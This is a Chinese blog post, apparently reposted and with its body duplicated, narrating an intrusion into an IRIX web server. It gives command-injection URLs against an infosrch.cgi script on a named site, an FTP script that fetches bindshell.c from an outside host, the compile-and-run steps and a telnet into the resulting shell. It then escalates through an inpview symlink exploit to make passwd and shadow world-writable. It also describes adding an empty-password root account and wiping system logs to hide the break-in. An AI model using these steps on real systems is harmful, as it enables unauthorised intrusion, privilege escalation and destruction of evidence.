一次尝试IRIX的过程(nobody shell)
程序员文章站
2022-05-12 23:46:19
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la
这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干... 08-10-08...
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la
这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还
是要弄出一个shell有个$来得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面这些其实就是把这一段东西输进/tmp/a中: open www.xfocus.org <---------别当真,这里没有这个东西;)
user quack quack <---------我的用户名密码
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------这是一个绑定shell的东西,网上到处有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
这里呢,就是在运行ftp取回东西了;)这么拿文件的话在xferlog里不会有记录。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 编译 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 运行…… 3、现在我们可以telnet上去了 bash# telnet *.*.*.* 12345
trying *.*.*.*...
connected to *.*.*.*.
escape character is ’^]’.
sh -i;
$content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用irix的inpview漏洞,该漏洞的描述如下: 某些版本irix下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文
件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的
setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。 漏洞利用程序就不贴了,大家自己看看,很简单的,总之编译完成之后。 $content$nbsp;./a.out /etc/passwd; copyright last stage of delirium jan 2000 poland //lsd-pl.net/
/usr/lib/inperson/inpview for irix 6.5 6.5.8 ip:all looking for temporary file... found!
……
…… $content$nbsp;./a.out /etc/shadow;
……
…… 就把这两个破文件的权限都改成0666了,往下该干什么活不用我说了吧……
加个uid0的帐号,密码为空,修改系统,删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的
东西干掉,把passwd和shadow恢复回原样,再touch一下。走人,睡觉。 btw:一句题外话,现在irix的telnetd漏洞很猛呀,还好要有irix系统编译exploit,少了些小孩做坏
事,还有,那天stardust说还有许多irix的lp默认密码为空,我看了一下,的确如此,印象中mixter
写了一个小段子专门搜索网上lp空密码帐号的……
这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还
是要弄出一个shell有个$来得方便些,于是就用ftp。 2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a
……
……
上面这些其实就是把这一段东西输进/tmp/a中: open www.xfocus.org <---------别当真,这里没有这个东西;)
user quack quack <---------我的用户名密码
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------这是一个绑定shell的东西,网上到处有
bye http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn
这里呢,就是在运行ftp取回东西了;)这么拿文件的话在xferlog里不会有记录。 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc 编译 http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc 运行…… 3、现在我们可以telnet上去了 bash# telnet *.*.*.* 12345
trying *.*.*.*...
connected to *.*.*.*.
escape character is ’^]’.
sh -i;
$content$nbsp;id;
uid=60001(nobody) gid=60001(nobody)
$ 4、利用irix的inpview漏洞,该漏洞的描述如下: 某些版本irix下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文
件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的
setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。 漏洞利用程序就不贴了,大家自己看看,很简单的,总之编译完成之后。 $content$nbsp;./a.out /etc/passwd; copyright last stage of delirium jan 2000 poland //lsd-pl.net/
/usr/lib/inperson/inpview for irix 6.5 6.5.8 ip:all looking for temporary file... found!
……
…… $content$nbsp;./a.out /etc/shadow;
……
…… 就把这两个破文件的权限都改成0666了,往下该干什么活不用我说了吧……
加个uid0的帐号,密码为空,修改系统,删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的
东西干掉,把passwd和shadow恢复回原样,再touch一下。走人,睡觉。 btw:一句题外话,现在irix的telnetd漏洞很猛呀,还好要有irix系统编译exploit,少了些小孩做坏
事,还有,那天stardust说还有许多irix的lp默认密码为空,我看了一下,的确如此,印象中mixter
写了一个小段子专门搜索网上lp空密码帐号的……
下一篇: 有防火墙网站的入侵过程